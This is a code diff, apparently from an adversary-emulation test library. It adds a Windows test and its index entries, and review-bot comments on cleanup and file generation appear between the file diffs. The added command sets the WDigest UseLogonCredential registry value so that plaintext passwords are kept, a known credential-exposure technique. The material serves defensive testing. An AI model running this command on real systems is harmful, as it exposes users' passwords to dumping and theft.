diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index dac4677b..3a4d075f 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -16,6 +16,8 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
+- [Atomic Test #4 - Modify registry for password downgrade to plain text](#atomic-test-4---modify-registry-for-password-downgrade-to-plain-text)
+
@@ -116,4 +118,24 @@ reg unload "HKU\$($ProfileList[$p].SID)"
+
+
+
+## Atomic Test #4 - Modify registry for password downgrade to plain text
+Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
+```
+reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+```
+
+
+#### Cleanup Commands:
+```
+reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
+```
+
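Review bot: The cleanup command in the Atomic Test #4 section writes `UseLogonCredential` as 0 unconditionally instead of restoring the state the test found. On a host where the value did not exist before the test, cleanup leaves a new value behind. On a host where it was already 1, cleanup changes the existing configuration. Consider deleting the value when the test created it (for example `reg delete ... /v UseLogonCredential /f`), or state in the description that cleanup forces 0 regardless of the prior state.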
diff --git a/atomics/index.md b/atomics/index.md
index 567f2776..01aadace 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -282,6 +282,7 @@
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
+ - Atomic Test #4: Modify registry for password downgrade to plain text [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 8e6d4189..4be6525f 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8156,6 +8156,23 @@ defense-evasion:
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
+ - name: Modify registry for password downgrade to plain text
+ description: "Sets registry key that will tell windows to store plaintext passwords
+ (making the system vulnerable to clear text / cleartext password dumping)
+ \n"
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
+ /v UseLogonCredential /t REG_DWORD /d 1 /f
+
+'
+ cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
+ /v UseLogonCredential /t REG_DWORD /d 0 /f
+
+'
T1170:
technique:
external_references:
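Review bot: The test definition added to index.yaml under `defense-evasion` has no matching change to an atomics/T1112/T1112.yaml source in the files shown in this patch, which touches only T1112.md, index.md, index.yaml and windows-index.md. If those four files are generated from the per-technique YAML, the new test needs to be added there as well, otherwise it is lost on the next regeneration. The `description` could also say what is changed: it is the `UseLogonCredential` value under the WDigest key rather than a registry key, and "windows" should be capitalised.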
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 1db34349..6a31951f 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -89,6 +89,7 @@
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
+ - Atomic Test #4: Modify registry for password downgrade to plain text [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)